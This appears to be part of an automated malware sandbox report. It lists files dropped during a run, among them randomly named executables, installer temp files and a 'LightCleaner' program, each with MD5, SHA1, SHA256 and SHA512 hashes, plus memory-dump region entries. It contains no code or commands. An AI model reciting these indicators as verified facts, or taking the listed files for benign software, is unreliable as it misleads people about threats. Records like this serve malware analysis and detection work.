C:\Users\Admin\Pictures\t7mVmjrk0ZvD02kvamNTn4XE.exe

MD5 bb4d6d8d6784ae4027bf456a4da94a54
SHA1 1c16e598906a1a90e88370a8d6fdcacc3e3b48fc
SHA256 bd8dad5cc34e4f61c5f9616843888d1b351efbed57209c9c010fffd9a643c294
SHA512 c6cae52ecb21c613bad881414556ac1a6dc5293ff92ddb57aba8e0a5fb3251c2791f68c4dcc31a7ef631ee823a39ae29fda7ca0f764242bc4a2dade77b46c4f6

\Users\Admin\Pictures\t7mVmjrk0ZvD02kvamNTn4XE.exe

MD5 bb4d6d8d6784ae4027bf456a4da94a54
SHA1 1c16e598906a1a90e88370a8d6fdcacc3e3b48fc
SHA256 bd8dad5cc34e4f61c5f9616843888d1b351efbed57209c9c010fffd9a643c294
SHA512 c6cae52ecb21c613bad881414556ac1a6dc5293ff92ddb57aba8e0a5fb3251c2791f68c4dcc31a7ef631ee823a39ae29fda7ca0f764242bc4a2dade77b46c4f6

C:\Users\Admin\Pictures\3LF4sNEp7nkJEysP3BMkGhDb.exe

MD5 6172d07e0711bc23642c3b6b86e4fec7
SHA1 c49a6bb96d15baa7d58ff9808c3311454959157b
SHA256 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6
SHA512 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b

C:\Users\Admin\Pictures\BamDCFN0sRfZmtUQzY0URkun.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

memory/900-274-0x0000000073F20000-0x000000007460E000-memory.dmp

memory/1340-271-0x0000000000400000-0x000000000046A000-memory.dmp

C:\Users\Admin\Pictures\BamDCFN0sRfZmtUQzY0URkun.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

\Users\Admin\Pictures\BamDCFN0sRfZmtUQzY0URkun.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

C:\Users\Admin\Pictures\3LF4sNEp7nkJEysP3BMkGhDb.exe

MD5 6172d07e0711bc23642c3b6b86e4fec7
SHA1 c49a6bb96d15baa7d58ff9808c3311454959157b
SHA256 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6
SHA512 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b

\Users\Admin\Pictures\HaqyStptACa6t5JKDui0cAkf.exe

MD5 9fd5293f6df01bd8e9daaf7820589b78
SHA1 be58cf67fc310d8b8fe706a6dccdffa52aeb1e35
SHA256 4f4c96457f0f44adcdbba07302ebaadb29d728ab9afc6c1605a54b7fe806c069
SHA512 8fea72232ec6e165dcd004399241ebfb93587fc5081b5f483e943520762b43c8572cd3dbe7a0990b22bbc38eb3be1a46aece1d627677f373b732910d339091ef

\Users\Admin\Pictures\3LF4sNEp7nkJEysP3BMkGhDb.exe

MD5 6172d07e0711bc23642c3b6b86e4fec7
SHA1 c49a6bb96d15baa7d58ff9808c3311454959157b
SHA256 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6
SHA512 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b

\Users\Admin\Pictures\iyLl1NDgn29kmwOyBmeudOST.exe

MD5 9110c26b4e982d541e19db0d4dd07ac4
SHA1 712dfa47ee8c828f01efa976de006679df20dde4
SHA256 960fb23ba0b64e081c49e12ea5062d95f15b1d1ccb63e743dac5ead8d2defa58
SHA512 a9f1acc4b5d90d01c45761ccf22945c4cef50c132d59db48b85f03eaebd27939550677333869c89dfbe09236dcb0db0c824fce1a37da4c394a9871155795a378

C:\Users\Admin\Pictures\HaqyStptACa6t5JKDui0cAkf.exe

MD5 9fd5293f6df01bd8e9daaf7820589b78
SHA1 be58cf67fc310d8b8fe706a6dccdffa52aeb1e35
SHA256 4f4c96457f0f44adcdbba07302ebaadb29d728ab9afc6c1605a54b7fe806c069
SHA512 8fea72232ec6e165dcd004399241ebfb93587fc5081b5f483e943520762b43c8572cd3dbe7a0990b22bbc38eb3be1a46aece1d627677f373b732910d339091ef

\Users\Admin\Pictures\HaqyStptACa6t5JKDui0cAkf.exe

MD5 9fd5293f6df01bd8e9daaf7820589b78
SHA1 be58cf67fc310d8b8fe706a6dccdffa52aeb1e35
SHA256 4f4c96457f0f44adcdbba07302ebaadb29d728ab9afc6c1605a54b7fe806c069
SHA512 8fea72232ec6e165dcd004399241ebfb93587fc5081b5f483e943520762b43c8572cd3dbe7a0990b22bbc38eb3be1a46aece1d627677f373b732910d339091ef

C:\Users\Admin\Pictures\mlhguxx0mid482Aj1auap4iS.exe

MD5 0e0a57f18c15969dcfd8e7b9343d281d
SHA1 cda5916ac88c029cc4f148c4554d06d25baf5de9
SHA256 5c1bb1d8835ee1fa1d28f595e43623e252f7e6f19986eda18b14d5615cb1dc14
SHA512 ef8830f931e8258c52b2f71b2808605006d154213dc0a442f7b65a9fd711e799210c4b38a20dffa482afbf0b758d2ed7bdcf0d765acfb368145c6b126ee3dd82

\Users\Admin\Pictures\mlhguxx0mid482Aj1auap4iS.exe

MD5 0e0a57f18c15969dcfd8e7b9343d281d
SHA1 cda5916ac88c029cc4f148c4554d06d25baf5de9
SHA256 5c1bb1d8835ee1fa1d28f595e43623e252f7e6f19986eda18b14d5615cb1dc14
SHA512 ef8830f931e8258c52b2f71b2808605006d154213dc0a442f7b65a9fd711e799210c4b38a20dffa482afbf0b758d2ed7bdcf0d765acfb368145c6b126ee3dd82

memory/900-305-0x0000000000100000-0x000000000041C000-memory.dmp

memory/2668-292-0x0000000073F20000-0x000000007460E000-memory.dmp

\Users\Admin\AppData\Local\Temp\Opera_installer_2310050449546743016.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

\Users\Admin\Pictures\DrE1Usuu459VAYyEgd2xENoZ.exe

MD5 6e45986a505bed78232a8867b5860ea6
SHA1 51b142a7e60eecd73c3eaa143eadda4b7e64ac4c
SHA256 c957aa07aa1dd6d58aff2431b56b2139a0c2d5d6b34d20a978767e0daab58829
SHA512 d2d8bc6179795c1c255ec5ac16817f83ff97fcd90481dbe2325a351b448c48a83af03f22ff6dda0cb6ad2401c20b81d2871068aa9e32d2747cc2f5669b440fde

memory/2668-303-0x0000000008B20000-0x000000000906D000-memory.dmp

memory/2668-309-0x0000000004B00000-0x0000000004B40000-memory.dmp

memory/1328-310-0x00000000FF940000-0x00000000FFA2C000-memory.dmp

memory/2628-302-0x0000000002890000-0x0000000002C88000-memory.dmp

C:\Users\Admin\Pictures\mlhguxx0mid482Aj1auap4iS.exe

MD5 0e0a57f18c15969dcfd8e7b9343d281d
SHA1 cda5916ac88c029cc4f148c4554d06d25baf5de9
SHA256 5c1bb1d8835ee1fa1d28f595e43623e252f7e6f19986eda18b14d5615cb1dc14
SHA512 ef8830f931e8258c52b2f71b2808605006d154213dc0a442f7b65a9fd711e799210c4b38a20dffa482afbf0b758d2ed7bdcf0d765acfb368145c6b126ee3dd82

C:\Users\Admin\Pictures\DrE1Usuu459VAYyEgd2xENoZ.exe

MD5 6e45986a505bed78232a8867b5860ea6
SHA1 51b142a7e60eecd73c3eaa143eadda4b7e64ac4c
SHA256 c957aa07aa1dd6d58aff2431b56b2139a0c2d5d6b34d20a978767e0daab58829
SHA512 d2d8bc6179795c1c255ec5ac16817f83ff97fcd90481dbe2325a351b448c48a83af03f22ff6dda0cb6ad2401c20b81d2871068aa9e32d2747cc2f5669b440fde

\Users\Admin\Pictures\DrE1Usuu459VAYyEgd2xENoZ.exe

MD5 6e45986a505bed78232a8867b5860ea6
SHA1 51b142a7e60eecd73c3eaa143eadda4b7e64ac4c
SHA256 c957aa07aa1dd6d58aff2431b56b2139a0c2d5d6b34d20a978767e0daab58829
SHA512 d2d8bc6179795c1c255ec5ac16817f83ff97fcd90481dbe2325a351b448c48a83af03f22ff6dda0cb6ad2401c20b81d2871068aa9e32d2747cc2f5669b440fde

C:\Users\Admin\Pictures\DrE1Usuu459VAYyEgd2xENoZ.exe

MD5 6e45986a505bed78232a8867b5860ea6
SHA1 51b142a7e60eecd73c3eaa143eadda4b7e64ac4c
SHA256 c957aa07aa1dd6d58aff2431b56b2139a0c2d5d6b34d20a978767e0daab58829
SHA512 d2d8bc6179795c1c255ec5ac16817f83ff97fcd90481dbe2325a351b448c48a83af03f22ff6dda0cb6ad2401c20b81d2871068aa9e32d2747cc2f5669b440fde

memory/3016-311-0x0000000000F10000-0x000000000145D000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-HGABT.tmp\3LF4sNEp7nkJEysP3BMkGhDb.tmp

MD5 83827c13d95750c766e5bd293469a7f8
SHA1 d21b45e9c672d0f85b8b451ee0e824567bb23f91
SHA256 8bd7e6b4a6be9f3887ac6439e97d3d3c8aaa27211d02ecbd925ab1df39afe7ae
SHA512 cdbdd93fc637772b12bdedb59c4fb72a291da61e8c6b0061ad2f9448e8c949543f003646b1f5ce3e1e3aebc12de27409ddd76d3874b8f4f098163a1ff328b6f0

C:\Users\Admin\AppData\Local\Temp\is-HGABT.tmp\3LF4sNEp7nkJEysP3BMkGhDb.tmp

MD5 83827c13d95750c766e5bd293469a7f8
SHA1 d21b45e9c672d0f85b8b451ee0e824567bb23f91
SHA256 8bd7e6b4a6be9f3887ac6439e97d3d3c8aaa27211d02ecbd925ab1df39afe7ae
SHA512 cdbdd93fc637772b12bdedb59c4fb72a291da61e8c6b0061ad2f9448e8c949543f003646b1f5ce3e1e3aebc12de27409ddd76d3874b8f4f098163a1ff328b6f0

\Users\Admin\AppData\Local\Temp\is-2Q7OT.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/2796-316-0x00000000001D0000-0x00000000001D1000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-2Q7OT.tmp\idp.dll

MD5 8f995688085bced38ba7795f60a5e1d3
SHA1 5b1ad67a149c05c50d6e388527af5c8a0af4343a
SHA256 203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006
SHA512 043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 24e8e435478730e2170d60ac036c3d34
SHA1 5da6593aa038321995e32152e48bceb6337d4dcc
SHA256 8febfa4b5df9ff22c43020d370cd229c766d89cf344b0852b0b1290b02415b2e
SHA512 f85c3300a410618a0796885175b2822fe9d3966461861dd98994c912bd7f28dd60dcf1867afe3ebf966a798fadb219a471d441e0aed3f35a4c8acb0d52e6b1bd

C:\Users\Admin\AppData\Local\Temp\849525425301

MD5 d94fccab299b0bd3183e7905957f5f1b
SHA1 7ce18279448f2e888b6cefa12aa54a3aa4d69915
SHA256 88a3d44d9f55abad0c49c8ef1132b03e0a01f7294ec1e64cd418973a1b65b61b
SHA512 b1d7fe2e40b64e18f85dd15b4027afbd91f44e16736804de8a499dcc3022cb47279c5b97ae8064c95fd129cf52d5c6eb3daffa63c674cf6ebf25201b895cd281

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 39576efe932859ea569e8d94dd3ffca9
SHA1 6a481454c042cf779ae70f9d7473bbcec75cbbe0
SHA256 eeb27db2f20b74e1a5c26d027176bce81f433f795937545026441a7bf7a17863
SHA512 77c3dbc3741fe723bf202f93b883784223b32b5d863759b3b00b2c1758ff271a982da31962d7b22727c03db363a94045e1bac1ab77836be57706b9d65ee0f4f0

C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe

MD5 d2b6d6065001364f1c9db16116385082
SHA1 1118e31a6cbd5b5bcb77d4858e7caabe2c330e85
SHA256 6dfaf0d68cb15ddfc954bc2a2e137b1d288ae90e520be11d63d455d19327b26d
SHA512 11a0e805e96a1f091ca21e6c3ea9b01c2edf68319168da4823f7252481ed79c5cb38316933190dacc05d79ae843b3d318de64e4ae696e4c6904403c761c5e9b0

\Users\Admin\AppData\Local\Temp\1000042051\s6.exe

MD5 d2b6d6065001364f1c9db16116385082
SHA1 1118e31a6cbd5b5bcb77d4858e7caabe2c330e85
SHA256 6dfaf0d68cb15ddfc954bc2a2e137b1d288ae90e520be11d63d455d19327b26d
SHA512 11a0e805e96a1f091ca21e6c3ea9b01c2edf68319168da4823f7252481ed79c5cb38316933190dacc05d79ae843b3d318de64e4ae696e4c6904403c761c5e9b0

C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe

MD5 d2b6d6065001364f1c9db16116385082
SHA1 1118e31a6cbd5b5bcb77d4858e7caabe2c330e85
SHA256 6dfaf0d68cb15ddfc954bc2a2e137b1d288ae90e520be11d63d455d19327b26d
SHA512 11a0e805e96a1f091ca21e6c3ea9b01c2edf68319168da4823f7252481ed79c5cb38316933190dacc05d79ae843b3d318de64e4ae696e4c6904403c761c5e9b0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 60fe01df86be2e5331b0cdbe86165686
SHA1 2a79f9713c3f192862ff80508062e64e8e0b29bd
SHA256 c08ccbc876cd5a7cdfa9670f9637da57f6a1282198a9bc71fc7d7247a6e5b7a8
SHA512 ef9f9a4dedcbfe339f4f3d07fb614645596c6f2b15608bdccdad492578b735f7cb075bdaa07178c764582ee345857ec4665f90342694e6a60786bb3d9b3a3d23

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 3ef6c941df177eb01f76a34179b1ff90
SHA1 576144a5ac24d175d82c56c29b0f55f8542ca544
SHA256 641c6df28d4ecc499d3d43fcf898c3c16f48de00165e472f652edd108533d16e
SHA512 57d7125f41857f45eac8507ed716eeee481178f19e0ec98ec028f2848f902597addd9e3db724c5f6c74c74f18b0b90dc2af1003bda7f81509c2aa50efa5c5a2c

\Users\Admin\AppData\Local\Temp\1000042051\s6.exe

MD5 d2b6d6065001364f1c9db16116385082
SHA1 1118e31a6cbd5b5bcb77d4858e7caabe2c330e85
SHA256 6dfaf0d68cb15ddfc954bc2a2e137b1d288ae90e520be11d63d455d19327b26d
SHA512 11a0e805e96a1f091ca21e6c3ea9b01c2edf68319168da4823f7252481ed79c5cb38316933190dacc05d79ae843b3d318de64e4ae696e4c6904403c761c5e9b0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 76dd410fba0b1d6128a6df3ad8d49615
SHA1 9d81000f6523161cf26298d31f4dcf3ff22e4907
SHA256 1d7a6f69ecdbd8387bc7c9ca28b1f9c412c62df994855de4be2f9d4e2c21f0a6
SHA512 0131c29061ef186b851d31988555ad0c355cf27954f68f4eeb18d552d660a9b815bcf17a812b4bfa864ea388c8ccdac9408317d20670c8e25c76f730c32da3db

memory/900-417-0x0000000004A00000-0x0000000004A40000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\AppData\Local\Temp\is-2Q7OT.tmp\8758677____.exe

MD5 65e5ccda7c002e24eb090ad1c9602b0f
SHA1 2daf02ebb81660eb07cff159d9bdfd7f544c2c13
SHA256 a29e50e997346fe1b47d0c93aafc4d9e08642c199d8ec1ef79f6d09e1618c439
SHA512 c46f1eb108b79011f63ca7907e8536e78034d1be26510b9cf0ffd4b69d46adcd084467bfb1419e7e069cda27d5e61b65092d58bec7c44c4939058ab75482525e

\Users\Admin\AppData\Local\Temp\is-2Q7OT.tmp\8758677____.exe

MD5 65e5ccda7c002e24eb090ad1c9602b0f
SHA1 2daf02ebb81660eb07cff159d9bdfd7f544c2c13
SHA256 a29e50e997346fe1b47d0c93aafc4d9e08642c199d8ec1ef79f6d09e1618c439
SHA512 c46f1eb108b79011f63ca7907e8536e78034d1be26510b9cf0ffd4b69d46adcd084467bfb1419e7e069cda27d5e61b65092d58bec7c44c4939058ab75482525e

memory/1744-441-0x0000000000EB0000-0x0000000000F34000-memory.dmp

memory/1744-442-0x000007FEF4F80000-0x000007FEF596C000-memory.dmp

memory/1744-443-0x0000000000AE0000-0x0000000000B42000-memory.dmp

memory/1340-444-0x0000000000400000-0x000000000046A000-memory.dmp

memory/900-445-0x0000000073F20000-0x000000007460E000-memory.dmp

memory/900-446-0x0000000004A00000-0x0000000004A40000-memory.dmp

memory/1068-449-0x000000013F7F0000-0x000000013FD33000-memory.dmp

memory/1328-450-0x0000000002C30000-0x0000000002DA1000-memory.dmp

memory/1328-451-0x00000000031A0000-0x00000000032D1000-memory.dmp

memory/1744-453-0x0000000000CF0000-0x0000000000D70000-memory.dmp

memory/2668-454-0x0000000008B20000-0x000000000906D000-memory.dmp

memory/1744-457-0x0000000002340000-0x000000000239E000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 09ed3bfdc09a5e54de6095876a7ad3fd
SHA1 653e5a7e94a5c0b9d41bb1fd287481fa25a7d8e4
SHA256 12ba2405803d15442e1eda14277345de802247f2cec6184f6b9b7cef8f807382
SHA512 ac71948096e1b79512f38b669ac6cdf4ef05fa0624bdcf3b09885079f8a3b7c3e40e4ddee0ca9fc5c119efb75debdaf482e909b8ecc34a6f75d37e8f0a292b6b

memory/2308-476-0x0000000002670000-0x0000000002A68000-memory.dmp

memory/2308-477-0x0000000002A70000-0x000000000335B000-memory.dmp

memory/2308-478-0x0000000000400000-0x0000000000D62000-memory.dmp

C:\Users\Admin\Pictures\t7mVmjrk0ZvD02kvamNTn4XE.exe

MD5 bb4d6d8d6784ae4027bf456a4da94a54
SHA1 1c16e598906a1a90e88370a8d6fdcacc3e3b48fc
SHA256 bd8dad5cc34e4f61c5f9616843888d1b351efbed57209c9c010fffd9a643c294
SHA512 c6cae52ecb21c613bad881414556ac1a6dc5293ff92ddb57aba8e0a5fb3251c2791f68c4dcc31a7ef631ee823a39ae29fda7ca0f764242bc4a2dade77b46c4f6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0c620d3ad19d09a20c8ed133406a8d53
SHA1 6923eb35299e9b69021015dda9e5c30b0b694526
SHA256 93c5a1a1b25296c680b88ec37c6441aae58ee13f24691acb47a24c46864935ee
SHA512 b4a6ad9a174857cce4a27dd314162bea9f52e0ef956ec9c8b2b9c736f58f7b8fa278eb351e3ae6cbb94b8c84fac69b6c6a33cd7a84530519c681b5cca9e458f1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 10a6fce06beea0376136e4bb4ca1abef
SHA1 e1381532f01141f3f260f67ac450d1cd3e76520c
SHA256 faa6aa4a7f09156c747684502afca475a3857cd2ffd010e532d8e929a606cf51
SHA512 63df7edeac333f81879a3f0d7fff0c40e5adf5718ff2a5058220b8067cd2d667c75ced730f6dc922c84ba3985699656dfaeab86264e748fe77fe8c6c4d94e48d

\Users\Admin\Pictures\Opera_installer_2310050450066113016.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

C:\Users\Admin\AppData\Local\Temp\df-50425-8d8-dbc80-0124fa55bc923\ZHefaezhyxaede.exe.config

MD5 98d2687aec923f98c37f7cda8de0eb19
SHA1 f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7
SHA256 8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465
SHA512 95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

memory/900-588-0x0000000004A00000-0x0000000004A40000-memory.dmp

memory/2592-589-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2796-586-0x0000000000400000-0x0000000000513000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\df-50425-8d8-dbc80-0124fa55bc923\ZHefaezhyxaede.exe

MD5 12b9ea8a702a9737e186f8057c5b4a3a
SHA1 4184e9decf6bbc584a822098249e905644c4def2
SHA256 0ede12df938accd1be25420696db2969815ca0a2cd22d0c68a3352faa88f1001
SHA512 f62f17cddde83b96e416a198abde4ece29f6e26bc95ee72f151ab05594859a1cf69afb918f4f1a0ef5d6a660b2d2cead419f9b396698512a8d32bb877ce50713

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 d310cb67a8763d6ed728cf8eeef6d31e
SHA1 d068b8c9731bd21719a7dd1276f250f239beb495
SHA256 ee8fb0c59fa7d47fe24b66149068453cbec92fe154f880a6579cdbf28ca91e0f
SHA512 00d62fff990b88d24b6f7174b76b28ee782ea3bd29e4a3bf43d7e0ea6c17f4b7f42d481b6f1300c53b2a5b4bd17213367a43506a7900a755027e0d0f7b928496

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EPZQZX3QG5BR56SX83FK.temp

MD5 d310cb67a8763d6ed728cf8eeef6d31e
SHA1 d068b8c9731bd21719a7dd1276f250f239beb495
SHA256 ee8fb0c59fa7d47fe24b66149068453cbec92fe154f880a6579cdbf28ca91e0f
SHA512 00d62fff990b88d24b6f7174b76b28ee782ea3bd29e4a3bf43d7e0ea6c17f4b7f42d481b6f1300c53b2a5b4bd17213367a43506a7900a755027e0d0f7b928496

memory/2752-598-0x000000001B140000-0x000000001B422000-memory.dmp

C:\Program Files\VideoLAN\EJGUUFMXLS\lightcleaner.exe

MD5 f8c7c7d63fe2d74fa007ace2598ff9cb
SHA1 23412ed810c3830ca9bab8cd25c61cf7d70d0b5a
SHA256 fd02825ce17effb7d70ca2e9907647128241610bb1dce11a70f6f1a19d052047
SHA512 0dfb9bcd6dd8ce3f561b885989ae4c2e78c33f110aa1bf48c4c42c467db672af422ebdbf2ef66fe6f2e21307c036fbfa885e58fc3c4fa1f9677139e818855258

memory/2592-583-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Program Files\VideoLAN\EJGUUFMXLS\lightcleaner.exe

MD5 f8c7c7d63fe2d74fa007ace2598ff9cb
SHA1 23412ed810c3830ca9bab8cd25c61cf7d70d0b5a
SHA256 fd02825ce17effb7d70ca2e9907647128241610bb1dce11a70f6f1a19d052047
SHA512 0dfb9bcd6dd8ce3f561b885989ae4c2e78c33f110aa1bf48c4c42c467db672af422ebdbf2ef66fe6f2e21307c036fbfa885e58fc3c4fa1f9677139e818855258

\Users\Admin\AppData\Local\Temp\is-375AR.tmp\lightcleaner.tmp

MD5 7bf46cc89fa0ea81ece9fc0eb9d38807
SHA1 803040acb0d2dda44091c23416586aaeeed04e4a
SHA256 31793ff8cdff66c5eb829ff1637d12b7afebd5fc95794946baccb6e96bf54649
SHA512 371c053ae2e4a0ab530b597c5cb9e07a35b9b391b79afa06b9c7bc3b4c172e8ffbd83aefd931c5eb39c9a4e8c991f74dfff94eb9014be5cb9af3edef7a335d41

memory/2752-603-0x00000000023E0000-0x00000000023E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-375AR.tmp\lightcleaner.tmp

MD5 7bf46cc89fa0ea81ece9fc0eb9d38807
SHA1 803040acb0d2dda44091c23416586aaeeed04e4a
SHA256 31793ff8cdff66c5eb829ff1637d12b7afebd5fc95794946baccb6e96bf54649
SHA512 371c053ae2e4a0ab530b597c5cb9e07a35b9b391b79afa06b9c7bc3b4c172e8ffbd83aefd931c5eb39c9a4e8c991f74dfff94eb9014be5cb9af3edef7a335d41

\Users\Admin\AppData\Local\Temp\is-URCHS.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\is-URCHS.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

\Users\Admin\AppData\Local\Temp\is-URCHS.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/1020-610-0x000000006D190000-0x000000006D73B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-375AR.tmp\lightcleaner.tmp

MD5 7bf46cc89fa0ea81ece9fc0eb9d38807
SHA1 803040acb0d2dda44091c23416586aaeeed04e4a
SHA256 31793ff8cdff66c5eb829ff1637d12b7afebd5fc95794946baccb6e96bf54649
SHA512 371c053ae2e4a0ab530b597c5cb9e07a35b9b391b79afa06b9c7bc3b4c172e8ffbd83aefd931c5eb39c9a4e8c991f74dfff94eb9014be5cb9af3edef7a335d41

memory/1020-620-0x000000006D190000-0x000000006D73B000-memory.dmp

memory/2752-625-0x0000000002400000-0x0000000002480000-memory.dmp

memory/2752-626-0x000007FEECF10000-0x000007FEED8AD000-memory.dmp

memory/2752-638-0x0000000002400000-0x0000000002480000-memory.dmp

memory/2752-643-0x0000000002404000-0x0000000002407000-memory.dmp

memory/2736-642-0x0000000000400000-0x00000000005B8000-memory.dmp

memory/1816-646-0x00000000001D0000-0x00000000001D1000-memory.dmp

\Program Files (x86)\LightCleaner\LightCleaner.exe

MD5 b1c46e53e92ce5c1b673a60b2db081ac
SHA1 6ef5e9f1ee2f0a325c43c2d92447310097f9f5b3
SHA256 ef4b529c5f506bf8a58522aed1e5ae7ebfec2155130e90bd92f9403883046489
SHA512 a6708c915b68cabc62b8a356c91e1e4d8facd5b5c28050d39dd8c0486d0e84440d6f75b4bdd78c348d44138a1686b152f6042fdaae0f5d0fce3a31aa5b9b46a5

